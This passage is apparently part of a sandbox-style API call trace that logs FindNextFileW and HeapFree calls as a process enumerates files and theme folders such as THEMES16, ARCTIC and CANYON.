ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x377ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="BASMLA.XSL", cAlternateFileName="")) returned 1 [0315.491] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.491] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7beb2bc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7beb2bc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7beb2bc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1cec0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="METCONV.DLL", cAlternateFileName="")) returned 1 [0315.491] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0315.491] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0ed7602, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0ed7602, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0ed7602, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0315.492] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0315.492] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf15d84bd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42b29f3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5f76153, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TEXTCONV", cAlternateFileName="")) returned 1 [0315.492] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0315.492] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26bd6427, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c86bce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c86bce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="THEMES16", cAlternateFileName="")) returned 1 [0315.493] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.493] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26bd6427, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c86bce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c86bce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ARCTIC", cAlternateFileName="")) returned 1 [0315.493] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.493] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26bd6427, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27abcfff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27abcfff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="AXIS", cAlternateFileName="")) returned 1 [0315.494] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.494] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27a70c44, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27a96da3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27a96da3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="BLENDS", cAlternateFileName="")) returned 1 [0315.494] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.494] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27a70c44, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27a70c44, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27a70c44, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="BLUECALM", cAlternateFileName="")) returned 1 [0315.539] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.539] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27abcfff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27ae323c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27ae323c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="BLUEPRNT", cAlternateFileName="")) returned 1 [0315.694] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.694] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27a96da3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27abcfff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27abcfff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="BOLDSTRI", cAlternateFileName="")) returned 1 [0316.264] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.264] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27a96da3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27abcfff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27abcfff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="BREEZE", cAlternateFileName="")) returned 1 [0316.429] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.430] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27abcfff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27abcfff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27abcfff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="CANYON", cAlternateFileName="")) returned 1 [0316.724] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0316.724] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27abcfff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27abcfff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27abcfff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="CAPSULES", cAlternateFileName="")) returned 1 [0317.053] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0317.055] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27ae323c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27ae323c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27ae323c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="CASCADE", cAlternateFileName="")) returned 1 [0317.197] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0317.197] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27ae323c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27ae323c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27ae323c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="COMPASS", cAlternateFileName="")) returned 1 [0317.291] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0317.292] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27abcfff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27b094aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27b094aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="CONCRETE", cAlternateFileName="")) returned 1 [0317.292] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.292] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27ae323c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27b094aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27b094aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="DEEPBLUE", cAlternateFileName="")) returned 1 [0317.293] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.293] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27ae323c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c86bce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c86bce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ECHO", cAlternateFileName="")) returned 1 [0317.293] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.293] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b094aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c86bce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c86bce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ECLIPSE", cAlternateFileName="")) returned 1 [0317.293] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.293] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b094aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27b094aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27b094aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="EDGE", cAlternateFileName="")) returned 1 [0317.294] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.294] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b094aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27b2f705, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27b2f705, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="EVRGREEN", cAlternateFileName="")) returned 1 [0317.294] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.294] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b094aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27b2f705, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27b2f705, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="EXPEDITN", cAlternateFileName="")) returned 1 [0317.295] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.295] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b094aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27ba1ded, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27ba1ded, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ICE", cAlternateFileName="")) returned 1 [0317.295] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.295] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b5591d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bee2a4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bee2a4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="INDUST", cAlternateFileName="")) returned 1 [0317.295] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.295] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b5591d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27b7bb91, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27b7bb91, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="IRIS", cAlternateFileName="")) returned 1 [0317.296] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.296] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b5591d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bc8052, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bc8052, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="JOURNAL", cAlternateFileName="")) returned 1 [0317.296] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.296] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b7bb91, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27ba1ded, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27ba1ded, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="LAYERS", cAlternateFileName="")) returned 1 [0317.296] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.296] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27b7bb91, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bc8052, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bc8052, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="LEVEL", cAlternateFileName="")) returned 1 [0317.297] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.297] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bc8052, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bc8052, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bc8052, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="NETWORK", cAlternateFileName="")) returned 1 [0317.297] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.297] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bc8052, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bc8052, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bc8052, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="PAPYRUS", cAlternateFileName="")) returned 1 [0317.297] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.297] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bc8052, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bee2a4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bee2a4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="PIXEL", cAlternateFileName="")) returned 1 [0317.297] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.297] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bc8052, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bc8052, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bc8052, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="PROFILE", cAlternateFileName="")) returned 1 [0317.298] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.298] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bc8052, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bee2a4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bee2a4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="QUAD", cAlternateFileName="")) returned 1 [0317.298] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.298] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bee2a4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bee2a4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bee2a4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="RADIAL", cAlternateFileName="")) returned 1 [0317.299] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.299] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bee2a4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27bee2a4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27bee2a4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="REFINED", cAlternateFileName="")) returned 1 [0317.299] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.299] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bee2a4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c144f9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c144f9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="RICEPAPR", cAlternateFileName="")) returned 1 [0317.300] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.300] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bee2a4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c144f9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c144f9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="RIPPLE", cAlternateFileName="")) returned 1 [0317.300] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.300] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27bee2a4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c144f9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c144f9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="RMNSQUE", cAlternateFileName="")) returned 1 [0317.300] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.300] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27c144f9, 